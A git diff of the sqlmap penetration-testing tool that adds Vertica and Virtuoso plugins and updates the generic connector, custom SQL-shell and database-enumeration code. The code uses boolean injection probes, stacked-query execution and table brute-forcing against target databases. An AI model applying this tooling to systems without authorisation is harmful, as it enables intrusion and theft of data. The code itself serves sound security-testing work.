+#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + pass diff --git a/plugins/dbms/vertica/fingerprint.py b/plugins/dbms/vertica/fingerprint.py new file mode 100644 index 00000000000..a98238041b1 --- /dev/null +++ b/plugins/dbms/vertica/fingerprint.py @@ -0,0 +1,106 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import VERTICA_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.VERTICA) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.VERTICA + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(VERTICA_ALIASES): + setDbms(DBMS.VERTICA) + + self.getBanner() + + return True + + infoMsg = "testing %s" % DBMS.VERTICA + logger.info(infoMsg) + + # NOTE: Vertica works too without the CONVERT_TO() + result = inject.checkBooleanExpression("BITSTRING_TO_BINARY(NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.VERTICA + logger.info(infoMsg) + + result = inject.checkBooleanExpression("HEX_TO_INTEGER(NULL) IS NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA + logger.warning(warnMsg) + + return False + + setDbms(DBMS.VERTICA) + + self.getBanner() + + if not conf.extensiveFp: + return True + + infoMsg = "actively fingerprinting %s" % DBMS.VERTICA + logger.info(infoMsg) + + if inject.checkBooleanExpression("CALENDAR_HIERARCHY_DAY(NULL) IS NULL"): + Backend.setVersion(">= 9.0") + else: + Backend.setVersion("< 9.0") + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.VERTICA + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/vertica/syntax.py b/plugins/dbms/vertica/syntax.py new file mode 100644 index 00000000000..556a0273c22 --- /dev/null +++ b/plugins/dbms/vertica/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT (CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104)) FROM foobar" + True + """ + + def escaper(value): + return "(%s)" % "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/vertica/takeover.py b/plugins/dbms/vertica/takeover.py new file mode 100644 index 00000000000..93c3dbd3ea9 --- /dev/null +++ b/plugins/dbms/vertica/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Vertica it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Vertica it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Vertica it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Vertica it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/virtuoso/__init__.py b/plugins/dbms/virtuoso/__init__.py new file mode 100644 index 00000000000..07f68d2ce62 --- /dev/null +++ b/plugins/dbms/virtuoso/__init__.py @@ -0,0 +1,29 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.enums import DBMS +from lib.core.settings import VIRTUOSO_SYSTEM_DBS +from lib.core.unescaper import unescaper +from plugins.dbms.virtuoso.enumeration import Enumeration +from plugins.dbms.virtuoso.filesystem import Filesystem +from plugins.dbms.virtuoso.fingerprint import Fingerprint +from plugins.dbms.virtuoso.syntax import Syntax +from plugins.dbms.virtuoso.takeover import Takeover +from plugins.generic.misc import Miscellaneous + +class VirtuosoMap(Syntax, Fingerprint, Enumeration, Filesystem, Miscellaneous, Takeover): + """ + This class defines Virtuoso methods + """ + + def __init__(self): + self.excludeDbsList = VIRTUOSO_SYSTEM_DBS + + for cls in self.__class__.__bases__: + cls.__init__(self) + + unescaper[DBMS.VIRTUOSO] = Syntax.escape diff --git a/plugins/dbms/virtuoso/connector.py b/plugins/dbms/virtuoso/connector.py new file mode 100644 index 00000000000..e2980734d7f --- /dev/null +++ b/plugins/dbms/virtuoso/connector.py @@ -0,0 +1,15 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.connector import Connector as GenericConnector + +class Connector(GenericConnector): + def connect(self): + errMsg = "on Virtuoso it is not (currently) possible to establish a " + errMsg += "direct connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/virtuoso/enumeration.py b/plugins/dbms/virtuoso/enumeration.py new file mode 100644 index 00000000000..25443703c0f --- /dev/null +++ b/plugins/dbms/virtuoso/enumeration.py @@ -0,0 +1,56 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.data import logger +from plugins.generic.enumeration import Enumeration as GenericEnumeration + +class Enumeration(GenericEnumeration): + def getPasswordHashes(self): + warnMsg = "on Virtuoso it is not possible to enumerate the user password hashes" + logger.warning(warnMsg) + + return {} + + def getPrivileges(self, *args, **kwargs): + warnMsg = "on Virtuoso it is not possible to enumerate the user privileges" + logger.warning(warnMsg) + + return {} + + def getRoles(self, *args, **kwargs): + warnMsg = "on Virtuoso it is not possible to enumerate the user roles" + logger.warning(warnMsg) + + return {} + + def searchDb(self): + warnMsg = "on Virtuoso it is not possible to search databases" + logger.warning(warnMsg) + + return [] + + def searchTable(self): + warnMsg = "on Virtuoso it is not possible to search tables" + logger.warning(warnMsg) + + return [] + + def searchColumn(self): + warnMsg = "on Virtuoso it is not possible to search columns" + logger.warning(warnMsg) + + return [] + + def search(self): + warnMsg = "on Virtuoso search option is not available" + logger.warning(warnMsg) + + def getStatements(self): + warnMsg = "on Virtuoso it is not possible to enumerate the SQL statements" + logger.warning(warnMsg) + + return [] diff --git a/plugins/dbms/virtuoso/filesystem.py b/plugins/dbms/virtuoso/filesystem.py new file mode 100644 index 00000000000..ada2ec7d61c --- /dev/null +++ b/plugins/dbms/virtuoso/filesystem.py @@ -0,0 +1,18 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.filesystem import Filesystem as GenericFilesystem + +class Filesystem(GenericFilesystem): + def readFile(self, remoteFile): + errMsg = "on Virtuoso it is not possible to read files" + raise SqlmapUnsupportedFeatureException(errMsg) + + def writeFile(self, localFile, remoteFile, fileType=None, forceCheck=False): + errMsg = "on Virtuoso it is not possible to write files" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/dbms/virtuoso/fingerprint.py b/plugins/dbms/virtuoso/fingerprint.py new file mode 100644 index 00000000000..b033511b8a6 --- /dev/null +++ b/plugins/dbms/virtuoso/fingerprint.py @@ -0,0 +1,89 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.common import Backend +from lib.core.common import Format +from lib.core.data import conf +from lib.core.data import kb +from lib.core.data import logger +from lib.core.enums import DBMS +from lib.core.session import setDbms +from lib.core.settings import VIRTUOSO_ALIASES +from lib.request import inject +from plugins.generic.fingerprint import Fingerprint as GenericFingerprint + +class Fingerprint(GenericFingerprint): + def __init__(self): + GenericFingerprint.__init__(self, DBMS.VIRTUOSO) + + def getFingerprint(self): + value = "" + wsOsFp = Format.getOs("web server", kb.headersFp) + + if wsOsFp: + value += "%s\n" % wsOsFp + + if kb.data.banner: + dbmsOsFp = Format.getOs("back-end DBMS", kb.bannerFp) + + if dbmsOsFp: + value += "%s\n" % dbmsOsFp + + value += "back-end DBMS: " + + if not conf.extensiveFp: + value += DBMS.VIRTUOSO + return value + + actVer = Format.getDbms() + blank = " " * 15 + value += "active fingerprint: %s" % actVer + + if kb.bannerFp: + banVer = kb.bannerFp.get("dbmsVersion") + + if banVer: + banVer = Format.getDbms([banVer]) + value += "\n%sbanner parsing fingerprint: %s" % (blank, banVer) + + htmlErrorFp = Format.getErrorParsedDBMSes() + + if htmlErrorFp: + value += "\n%shtml error message fingerprint: %s" % (blank, htmlErrorFp) + + return value + + def checkDbms(self): + if not conf.extensiveFp and Backend.isDbmsWithin(VIRTUOSO_ALIASES): + setDbms(DBMS.VIRTUOSO) + return True + + infoMsg = "testing %s" % DBMS.VIRTUOSO + logger.info(infoMsg) + + result = inject.checkBooleanExpression("GET_KEYWORD(NULL,NULL) IS NULL") + + if result: + infoMsg = "confirming %s" % DBMS.VIRTUOSO + logger.info(infoMsg) + + result = inject.checkBooleanExpression("RDF_NOW_IMPL() IS NOT NULL") + + if not result: + warnMsg = "the back-end DBMS is not %s" % DBMS.VIRTUOSO + logger.warning(warnMsg) + + return False + + setDbms(DBMS.VIRTUOSO) + + return True + else: + warnMsg = "the back-end DBMS is not %s" % DBMS.VIRTUOSO + logger.warning(warnMsg) + + return False diff --git a/plugins/dbms/virtuoso/syntax.py b/plugins/dbms/virtuoso/syntax.py new file mode 100644 index 00000000000..7ba5c8b9f38 --- /dev/null +++ b/plugins/dbms/virtuoso/syntax.py @@ -0,0 +1,22 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.convert import getOrds +from plugins.generic.syntax import Syntax as GenericSyntax + +class Syntax(GenericSyntax): + @staticmethod + def escape(expression, quote=True): + """ + >>> Syntax.escape("SELECT 'abcdefgh' FROM foobar") == "SELECT CHR(97)||CHR(98)||CHR(99)||CHR(100)||CHR(101)||CHR(102)||CHR(103)||CHR(104) FROM foobar" + True + """ + + def escaper(value): + return "||".join("CHR(%d)" % _ for _ in getOrds(value)) + + return Syntax._escape(expression, quote, escaper) diff --git a/plugins/dbms/virtuoso/takeover.py b/plugins/dbms/virtuoso/takeover.py new file mode 100644 index 00000000000..e91c8050796 --- /dev/null +++ b/plugins/dbms/virtuoso/takeover.py @@ -0,0 +1,28 @@ +#!/usr/bin/env python + +""" +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission +""" + +from lib.core.exception import SqlmapUnsupportedFeatureException +from plugins.generic.takeover import Takeover as GenericTakeover + +class Takeover(GenericTakeover): + def osCmd(self): + errMsg = "on Virtuoso it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osShell(self): + errMsg = "on Virtuoso it is not possible to execute commands" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osPwn(self): + errMsg = "on Virtuoso it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) + + def osSmb(self): + errMsg = "on Virtuoso it is not possible to establish an " + errMsg += "out-of-band connection" + raise SqlmapUnsupportedFeatureException(errMsg) diff --git a/plugins/generic/__init__.py b/plugins/generic/__init__.py index 9e1072a9c4f..bcac841631b 100644 --- a/plugins/generic/__init__.py +++ b/plugins/generic/__init__.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ pass diff --git a/plugins/generic/connector.py b/plugins/generic/connector.py index 5edfcc33ec0..ee235b13b63 100644 --- a/plugins/generic/connector.py +++ b/plugins/generic/connector.py @@ -1,8 +1,8 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ import os @@ -12,7 +12,7 @@ from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapUndefinedMethod -class Connector: +class Connector(object): """ This class defines generic dbms protocol functionalities for plugins. """ @@ -20,23 +20,24 @@ class Connector: def __init__(self): self.connector = None self.cursor = None + self.hostname = None def initConnection(self): - self.user = conf.dbmsUser - self.password = conf.dbmsPass if conf.dbmsPass is not None else "" + self.user = conf.dbmsUser or "" + self.password = conf.dbmsPass or "" self.hostname = conf.hostname self.port = conf.port self.db = conf.dbmsDb - def connected(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d established" % self.port - logger.info(infoMsg) + def printConnected(self): + if self.hostname and self.port: + infoMsg = "connection to %s server '%s:%d' established" % (conf.dbms, self.hostname, self.port) + logger.info(infoMsg) def closed(self): - infoMsg = "connection to %s server %s" % (conf.dbms, self.hostname) - infoMsg += ":%d closed" % self.port - logger.info(infoMsg) + if self.hostname and self.port: + infoMsg = "connection to %s server '%s:%d' closed" % (conf.dbms, self.hostname, self.port) + logger.info(infoMsg) self.connector = None self.cursor = None @@ -46,10 +47,12 @@ def initCursor(self): def close(self): try: - self.cursor.close() - self.connector.close() - except Exception, msg: - logger.debug(msg) + if self.cursor: + self.cursor.close() + if self.connector: + self.connector.close() + except Exception as ex: + logger.debug(ex) finally: self.closed() @@ -60,20 +63,20 @@ def checkFileDb(self): def connect(self): errMsg = "'connect' method must be defined " - errMsg += "into the specific DBMS plugin" + errMsg += "inside the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) def fetchall(self): errMsg = "'fetchall' method must be defined " - errMsg += "into the specific DBMS plugin" + errMsg += "inside the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) def execute(self, query): errMsg = "'execute' method must be defined " - errMsg += "into the specific DBMS plugin" + errMsg += "inside the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) def select(self, query): errMsg = "'select' method must be defined " - errMsg += "into the specific DBMS plugin" + errMsg += "inside the specific DBMS plugin" raise SqlmapUndefinedMethod(errMsg) diff --git a/plugins/generic/custom.py b/plugins/generic/custom.py index 33a98e2e75f..de4ef537523 100644 --- a/plugins/generic/custom.py +++ b/plugins/generic/custom.py @@ -1,26 +1,37 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +from __future__ import print_function + import re +import sys from lib.core.common import Backend from lib.core.common import dataToStdout from lib.core.common import getSQLSnippet -from lib.core.common import isTechniqueAvailable -from lib.core.convert import utf8decode +from lib.core.common import isListLike +from lib.core.common import isStackingAvailable +from lib.core.common import joinValue +from lib.core.compat import xrange +from lib.core.convert import getUnicode from lib.core.data import conf from lib.core.data import logger from lib.core.dicts import SQL_STATEMENTS -from lib.core.enums import PAYLOAD +from lib.core.enums import AUTOCOMPLETE_TYPE +from lib.core.enums import DBMS +from lib.core.exception import SqlmapNoneDataException +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import NULL from lib.core.settings import PARAMETER_SPLITTING_REGEX from lib.core.shell import autoCompletion from lib.request import inject +from thirdparty.six.moves import input as _input -class Custom: +class Custom(object): """ This class defines custom enumeration functionalities for plugins. """ @@ -33,38 +44,52 @@ def sqlQuery(self, query): sqlType = None query = query.rstrip(';') - for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): - for sqlStatement in sqlStatements: - if query.lower().startswith(sqlStatement): - sqlType = sqlTitle - break - if 'OPENROWSET' not in query.upper() and (not sqlType or 'SELECT' in sqlType): - infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) - logger.info(infoMsg) + try: + for sqlTitle, sqlStatements in SQL_STATEMENTS.items(): + for sqlStatement in sqlStatements: + if query.lower().startswith(sqlStatement): + sqlType = sqlTitle + break + + if not re.search(r"\b(OPENROWSET|INTO)\b", query, re.I) and (not sqlType or "SELECT" in sqlType): + infoMsg = "fetching %s query output: '%s'" % (sqlType if sqlType is not None else "SQL", query) + logger.info(infoMsg) + + if Backend.isDbms(DBMS.MSSQL): + match = re.search(r"(\bFROM\s+)([^\s]+)", query, re.I) + if match and match.group(2).count('.') == 1: + query = query.replace(match.group(0), "%s%s" % (match.group(1), match.group(2).replace('.', ".dbo."))) + + query = re.sub(r"(?i)\w+%s\.?" % METADB_SUFFIX, "", query) - output = inject.getValue(query, fromUser=True) + output = inject.getValue(query, fromUser=True) - return output - elif not isTechniqueAvailable(PAYLOAD.TECHNIQUE.STACKED) and not conf.direct: - warnMsg = "execution of custom SQL queries is only " + if sqlType and "SELECT" in sqlType and isListLike(output): + for i in xrange(len(output)): + if isListLike(output[i]): + output[i] = joinValue(output[i]) + + return output + elif not isStackingAvailable() and not conf.direct: + warnMsg = "execution of non-query SQL statements is only " warnMsg += "available when stacked queries are supported" - logger.warn(warnMsg) + logger.warning(warnMsg) return None - else: - if sqlType: - debugMsg = "executing %s query: '%s'" % (sqlType if sqlType is not None else "SQL", query) else: - debugMsg = "executing unknown SQL type query: '%s'" % query - logger.debug(debugMsg) + if sqlType: + infoMsg = "executing %s statement: '%s'" % (sqlType if sqlType is not None else "SQL", query) + else: + infoMsg = "executing unknown SQL command: '%s'" % query + logger.info(infoMsg) - inject.goStacked(query) + inject.goStacked(query) - debugMsg = "done" - logger.debug(debugMsg) + output = NULL - output = False + except SqlmapNoneDataException as ex: + logger.warning(ex) return output @@ -73,20 +98,25 @@ def sqlShell(self): infoMsg += "'x' or 'q' and press ENTER" logger.info(infoMsg) - autoCompletion(sqlShell=True) + autoCompletion(AUTOCOMPLETE_TYPE.SQL) while True: query = None try: - query = raw_input("sql-shell> ") - query = utf8decode(query) + query = _input("sql-shell> ") + query = getUnicode(query, encoding=sys.stdin.encoding) + query = query.strip("; ") + except UnicodeDecodeError: + print() + errMsg = "invalid user input" + logger.error(errMsg) except KeyboardInterrupt: - print + print() errMsg = "user aborted" logger.error(errMsg) except EOFError: - print + print() errMsg = "exit" logger.error(errMsg) break @@ -100,7 +130,7 @@ def sqlShell(self): output = self.sqlQuery(query) if output and output != "Quit": - conf.dumper.query(query, output) + conf.dumper.sqlQuery(query, output) elif not output: pass @@ -112,15 +142,18 @@ def sqlFile(self): infoMsg = "executing SQL statements from given file(s)" logger.info(infoMsg) - for sfile in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): - sfile = sfile.strip() + for filename in re.split(PARAMETER_SPLITTING_REGEX, conf.sqlFile): + filename = filename.strip() - if not sfile: + if not filename: continue - query = getSQLSnippet(Backend.getDbms(), sfile) + snippet = getSQLSnippet(Backend.getDbms(), filename) - infoMsg = "executing SQL statement%s from file '%s'" % ("s" if ";" in query else "", sfile) - logger.info(infoMsg) - - conf.dumper.query(query, self.sqlQuery(query)) + if snippet and all(query.strip().upper().startswith("SELECT") for query in (_ for _ in snippet.split(';' if ';' in snippet else '\n') if _)): + for query in (_ for _ in snippet.split(';' if ';' in snippet else '\n') if _): + query = query.strip() + if query: + conf.dumper.sqlQuery(query, self.sqlQuery(query)) + else: + conf.dumper.sqlQuery(snippet, self.sqlQuery(snippet)) diff --git a/plugins/generic/databases.py b/plugins/generic/databases.py index 6ad8b1c041f..7f05d50ef38 100644 --- a/plugins/generic/databases.py +++ b/plugins/generic/databases.py @@ -1,14 +1,18 @@ #!/usr/bin/env python """ -Copyright (c) 2006-2013 sqlmap developers (http://sqlmap.org/) -See the file 'doc/COPYING' for copying permission +Copyright (c) 2006-2026 sqlmap developers (https://sqlmap.org) +See the file 'LICENSE' for copying permission """ +import re + from lib.core.agent import agent from lib.core.common import arrayizeValue from lib.core.common import Backend +from lib.core.common import filterNone from lib.core.common import filterPairValues +from lib.core.common import flattenValue from lib.core.common import getLimitRange from lib.core.common import isInferenceAvailable from lib.core.common import isListLike @@ -20,6 +24,9 @@ from lib.core.common import pushValue from lib.core.common import readInput from lib.core.common import safeSQLIdentificatorNaming +from lib.core.common import safeStringFormat +from lib.core.common import singleTimeLogMessage +from lib.core.common import singleTimeWarnMessage from lib.core.common import unArrayizeValue from lib.core.common import unsafeSQLIdentificatorNaming from lib.core.data import conf @@ -27,20 +34,30 @@ from lib.core.data import logger from lib.core.data import paths from lib.core.data import queries +from lib.core.decorators import stackedmethod +from lib.core.dicts import ALTIBASE_TYPES from lib.core.dicts import FIREBIRD_TYPES +from lib.core.dicts import INFORMIX_TYPES from lib.core.enums import CHARSET_TYPE from lib.core.enums import DBMS from lib.core.enums import EXPECTED +from lib.core.enums import FORK from lib.core.enums import PAYLOAD from lib.core.exception import SqlmapMissingMandatoryOptionException from lib.core.exception import SqlmapNoneDataException from lib.core.exception import SqlmapUserQuitException from lib.core.settings import CURRENT_DB +from lib.core.settings import METADB_SUFFIX +from lib.core.settings import PLUS_ONE_DBMSES +from lib.core.settings import REFLECTED_VALUE_MARKER +from lib.core.settings import UPPER_CASE_DBMSES +from lib.core.settings import VERTICA_DEFAULT_SCHEMA from lib.request import inject -from lib.techniques.brute.use import columnExists -from lib.techniques.brute.use import tableExists +from lib.utils.brute import columnExists +from lib.utils.brute import tableExists +from thirdparty import six -class Databases: +class Databases(object): """ This class defines databases' enumeration functionalities for plugins. """ @@ -52,6 +69,7 @@ def __init__(self): kb.data.cachedColumns = {} kb.data.cachedCounts = {} kb.data.dumpedTable = {} + kb.data.cachedStatements = [] def getCurrentDb(self): infoMsg = "fetching current database" @@ -62,6 +80,20 @@ def getCurrentDb(self): if not kb.data.currentDb: kb.data.currentDb = unArrayizeValue(inject.getValue(query, safeCharEncode=False)) + if not kb.data.currentDb and Backend.isDbms(DBMS.VERTICA): + kb.data.currentDb = VERTICA_DEFAULT_SCHEMA + + if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE): + warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms() + warnMsg += "schema names for enumeration as the counterpart to database " + warnMsg += "names on other DBMSes" + singleTimeWarnMessage(warnMsg) + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.CUBRID): + warnMsg = "on %s you'll need to use " % Backend.getIdentifiedDbms() + warnMsg += "user names for enumeration as the counterpart to database " + warnMsg += "names on other DBMSes" + singleTimeWarnMessage(warnMsg) + return kb.data.currentDb def getDbs(self): @@ -74,22 +106,24 @@ def getDbs(self): warnMsg = "information_schema not available, " warnMsg += "back-end DBMS is MySQL < 5. database " warnMsg += "names will be fetched from 'mysql' database" - logger.warn(warnMsg) + logger.warning(warnMsg) - elif Backend.isDbms(DBMS.ORACLE): - warnMsg = "schema names are going to be used on Oracle " + elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2, DBMS.PGSQL, DBMS.MONETDB, DBMS.DERBY, DBMS.VERTICA, DBMS.PRESTO, DBMS.MIMERSQL, DBMS.CRATEDB, DBMS.CACHE, DBMS.FRONTBASE, DBMS.SNOWFLAKE): + warnMsg = "schema names are going to be used on %s " % Backend.getIdentifiedDbms() warnMsg += "for enumeration as the counterpart to database " warnMsg += "names on other DBMSes" - logger.warn(warnMsg) + logger.warning(warnMsg) infoMsg = "fetching database (schema) names" - elif Backend.isDbms(DBMS.DB2): - warnMsg = "schema names are going to be used on IBM DB2 " + + elif Backend.getIdentifiedDbms() in (DBMS.ALTIBASE, DBMS.CUBRID): + warnMsg = "user names are going to be used on %s " % Backend.getIdentifiedDbms() warnMsg += "for enumeration as the counterpart to database " warnMsg += "names on other DBMSes" - logger.warn(warnMsg) + logger.warning(warnMsg) + + infoMsg = "fetching database (user) names" - infoMsg = "fetching database (schema) names" else: infoMsg = "fetching database names" @@ -122,7 +156,7 @@ def getDbs(self): errMsg = "unable to retrieve the number of databases" logger.error(errMsg) else: - plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) + plusOne = Backend.getIdentifiedDbms() in PLUS_ONE_DBMSES indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: @@ -132,9 +166,10 @@ def getDbs(self): query = rootQuery.blind.query2 % index else: query = rootQuery.blind.query % index + db = unArrayizeValue(inject.getValue(query, union=False, error=False)) - if db: + if not isNoneValue(db): kb.data.cachedDbs.append(safeSQLIdentificatorNaming(db)) if not kb.data.cachedDbs and Backend.isDbms(DBMS.MSSQL): @@ -171,7 +206,7 @@ def getDbs(self): kb.data.cachedDbs.sort() if kb.data.cachedDbs: - kb.data.cachedDbs = list(set(kb.data.cachedDbs)) + kb.data.cachedDbs = [_ for _ in set(flattenValue(kb.data.cachedDbs)) if _] return kb.data.cachedDbs @@ -183,21 +218,24 @@ def getTables(self, bruteForce=None): if bruteForce is None: if Backend.isDbms(DBMS.MYSQL) and not kb.data.has_information_schema: - errMsg = "information_schema not available, " - errMsg += "back-end DBMS is MySQL < 5.0" - logger.error(errMsg) + warnMsg = "information_schema not available, " + warnMsg += "back-end DBMS is MySQL < 5.0" + logger.warning(warnMsg) + bruteForce = True + + elif Backend.getIdentifiedDbms() in (DBMS.MCKOI, DBMS.EXTREMEDB, DBMS.RAIMA): bruteForce = True - elif Backend.isDbms(DBMS.ACCESS): + elif Backend.getIdentifiedDbms() in (DBMS.ACCESS,): try: tables = self.getTables(False) except SqlmapNoneDataException: tables = None if not tables: - errMsg = "cannot retrieve table names, " - errMsg += "back-end DBMS is Access" - logger.error(errMsg) + warnMsg = "cannot retrieve table names, " + warnMsg += "back-end DBMS is %s" % Backend.getIdentifiedDbms() + logger.warning(warnMsg) bruteForce = True else: return tables @@ -205,19 +243,19 @@ def getTables(self, bruteForce=None): if conf.db == CURRENT_DB: conf.db = self.getCurrentDb() - if conf.db and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): + if conf.db and Backend.getIdentifiedDbms() in UPPER_CASE_DBMSES: conf.db = conf.db.upper() if conf.db: - dbs = conf.db.split(",") + dbs = conf.db.split(',') else: dbs = self.getDbs() + dbs = [_ for _ in dbs if _ and _.strip()] + for db in dbs: dbs[dbs.index(db)] = safeSQLIdentificatorNaming(db) - dbs = filter(None, dbs) - if bruteForce: resumeAvailable = False @@ -226,7 +264,7 @@ def getTables(self, bruteForce=None): resumeAvailable = True break - if resumeAvailable: + if resumeAvailable and not conf.freshQueries: for db, table in kb.brute.tables: if db == conf.db: if conf.db not in kb.data.cachedTables: @@ -236,114 +274,174 @@ def getTables(self, bruteForce=None): return kb.data.cachedTables - message = "do you want to use common table existence check? %s" % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS,) else "[y/N/q]") - test = readInput(message, default="Y" if "Y" in message else "N") + message = "do you want to use common table existence check? %s " % ("[Y/n/q]" if Backend.getIdentifiedDbms() in (DBMS.ACCESS, DBMS.MCKOI, DBMS.EXTREMEDB) else "[y/N/q]") + choice = readInput(message, default='Y' if 'Y' in message else 'N').upper() - if test[0] in ("n", "N"): + if choice == 'N': return - elif test[0] in ("q", "Q"): + elif choice == 'Q': raise SqlmapUserQuitException else: return tableExists(paths.COMMON_TABLES) infoMsg = "fetching tables for database" - infoMsg += "%s: '%s'" % ("s" if len(dbs) > 1 else "", ", ".join(db if isinstance(db, basestring) else db[0] for db in sorted(dbs))) + infoMsg += "%s: '%s'" % ("s" if len(dbs) > 1 else "", ", ".join(unsafeSQLIdentificatorNaming(unArrayizeValue(db)) for db in sorted(dbs))) logger.info(infoMsg) rootQuery = queries[Backend.getIdentifiedDbms()].tables if any(isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: - query = rootQuery.inband.query - condition = rootQuery.inband.condition if 'condition' in rootQuery.inband else None + values = [] - if condition: - if 